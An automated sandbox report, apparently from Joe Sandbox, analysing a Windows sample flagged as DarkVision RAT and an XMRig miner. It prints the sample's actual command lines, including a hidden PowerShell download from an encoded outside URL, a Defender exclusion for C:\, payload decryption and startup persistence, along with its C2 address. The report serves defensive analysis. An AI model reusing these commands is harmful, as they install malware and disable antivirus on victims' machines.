Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1571252
MD5:a3d68745e8919e2a48d8fa0738da124e
SHA1:85ea6ab1d2d3f6af2011b130756d57f31539e171
SHA256:65bc085f99db63b0581b2153a0aa2d7151133aafeeb2810f56a5d17ef9760d46
Tags:exeuser-Bitsight
Infos:

Detection

DarkVision Rat, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected DarkVision Rat
Yara detected UAC Bypass using CMSTP
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal saved passwords of Firefox
Drops script or batch files to the startup folder
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking mutex)
Found evasive API chain checking for user administrative privileges
Found suspicious powershell code related to unpacking or dynamic code loading
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Powershell drops PE file
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Searches for specific processes (likely to inject)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses powercfg.exe to modify the power settings
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query locales information (e.g. system language)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates driver files
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Remote Thread Creation By Uncommon Source Image
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Terminates after testing mutex exists (may check infected machine status)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 2200 cmdline: "C:\Users\user\Desktop\file.exe" MD5: A3D68745E8919E2A48D8FA0738DA124E)
    • cmd.exe (PID: 1800 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp\295D.bat C:\Users\user\Desktop\file.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 4456 cmdline: net session MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
        • net1.exe (PID: 5800 cmdline: C:\Windows\system32\net1 session MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
      • powershell.exe (PID: 7000 cmdline: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7216 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • timeout.exe (PID: 7392 cmdline: timeout /t 10 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
      • powershell.exe (PID: 7644 cmdline: powershell -WindowStyle Hidden -Command "$key = [System.Text.Encoding]::UTF8.GetBytes('blMgb+WrfPrXMFxK7ymKPM3SVHUAYPt9');" "$iv = [System.Text.Encoding]::UTF8.GetBytes('5t9nsUPo0cA/tUjH');" "$aes = [System.Security.Cryptography.Aes]::Create();" "$aes.Key = $key; $aes.IV = $iv;" "$decryptor = $aes.CreateDecryptor();" "$inputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin';" "$encryptedBytes = [System.IO.File]::ReadAllBytes($inputFile);" "$decryptedBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length);" "$outputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.exe';" "[System.IO.File]::WriteAllBytes($outputFile, $decryptedBytes);" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • downloaded_file.exe (PID: 7724 cmdline: "C:\Users\user\AppData\Local\Temp\downloaded_file.exe" MD5: D60C9E070239F8C240AAA6D8832E11EF)
        • cmd.exe (PID: 7740 cmdline: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7800 cmdline: powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • explorer.exe (PID: 7784 cmdline: "C:\Windows\explorer.exe" MD5: 662F4F92FDE3557E86D110526BB578D5)
          • explorer.exe (PID: 8028 cmdline: C:\Windows\EXPLORER.EXE {DF4EE2DA-C20C-4BBF-97D5-4B94E23FE1C8} MD5: 662F4F92FDE3557E86D110526BB578D5)
          • WindosCPUsystem.exe (PID: 8084 cmdline: "C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe" "" MD5: 56EC5472231866630749CCF6977C4FBD)
            • powercfg.exe (PID: 8100 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
              • conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powercfg.exe (PID: 8108 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
              • conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powercfg.exe (PID: 8124 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
              • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powercfg.exe (PID: 8140 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
              • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • explorer.exe (PID: 1436 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cmd.exe (PID: 7144 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoRun_WindosCPUsystem.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WindosCPUsystem.exe (PID: 1196 cmdline: "C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe" MD5: 56EC5472231866630749CCF6977C4FBD)
      • powercfg.exe (PID: 3164 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 4476 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 4168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 4264 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 6448 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 5336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

Threatname: DarkVision Rat

{"C2": "185.157.162.216", "Port": 5200}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\downloaded_file.exeJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
    C:\Users\user\AppData\Local\Temp\downloaded_file.exeJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      C:\Users\user\AppData\Local\Temp\downloaded_file.exeINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
      • 0x31980:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
      • 0x318c0:$s1: CoGetObject
      • 0x31948:$s2: Elevation:Administrator!new:

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000000C.00000002.1939596081.0000029E75EE0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
        0000000C.00000002.1939596081.0000029E75EE0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000013.00000002.2047760821.0000016DE66D1000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
          • 0x276b59:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
          • 0x27a08f:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
          0000001F.00000002.2065498416.000001677AB40000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
          • 0x276b19:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
          • 0x27a04f:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
          00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
            Click to see the 24 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            13.2.downloaded_file.exe.300000.0.unpackJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
              13.2.downloaded_file.exe.300000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                13.2.downloaded_file.exe.300000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                • 0x31980:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                • 0x318c0:$s1: CoGetObject
                • 0x31948:$s2: Elevation:Administrator!new:
                12.2.powershell.exe.29e75ee9280.1.unpackJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
                  12.2.powershell.exe.29e75ee9280.1.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    Click to see the 22 entries

                    Sigma Signatures

                    Change of critical system settings

                    barindex
                    Sigma detected: Disable power options
                    Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe" "", ParentImage: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe, ParentProcessId: 8084, ParentProcessName: WindosCPUsystem.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 8100, ProcessName: powercfg.exe

                    System Summary

                    barindex
                    Sigma detected: Base64 Encoded PowerShell Command Detected
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp\295D.bat C:\Users\user\Desktop\file.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1800, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", ProcessId: 7216, ProcessName: powershell.exe
                    Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp\295D.bat C:\Users\user\Desktop\file.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1800, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", ProcessId: 7216, ProcessName: powershell.exe
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp\295D.bat C:\Users\user\Desktop\file.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1800, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7000, ProcessName: powershell.exe
                    Sigma detected: Suspicious Invoke-WebRequest Execution
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp\295D.bat C:\Users\user\Desktop\file.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1800, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", ProcessId: 7216, ProcessName: powershell.exe
                    Sigma detected: Suspicious Script Execution From Temp Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp\295D.bat C:\Users\user\Desktop\file.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1800, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", ProcessId: 7216, ProcessName: powershell.exe
                    Sigma detected: PowerShell Web Download
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp\295D.bat C:\Users\user\Desktop\file.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1800, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", ProcessId: 7216, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp\295D.bat C:\Users\user\Desktop\file.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1800, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7000, ProcessName: powershell.exe
                    Sigma detected: Remote Thread Creation By Uncommon Source Image
                    Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\explorer.exe, SourceProcessId: 7784, StartAddress: 4F0000, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 8028
                    Sigma detected: Usage Of Web Request Commands And Cmdlets
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp\295D.bat C:\Users\user\Desktop\file.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1800, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", ProcessId: 7216, ProcessName: powershell.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp\295D.bat C:\Users\user\Desktop\file.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1800, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7000, ProcessName: powershell.exe

                    Data Obfuscation

                    barindex
                    Sigma detected: Drops script at startup location
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\cmd.exe, ProcessId: 1800, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoRun_WindosCPUsystem.bat

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-09T07:37:36.142909+010020362892Crypto Currency Mining Activity Detected192.168.2.4548921.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-09T07:37:29.980726+010020283713Unknown Traffic192.168.2.449738154.216.20.243443TCP
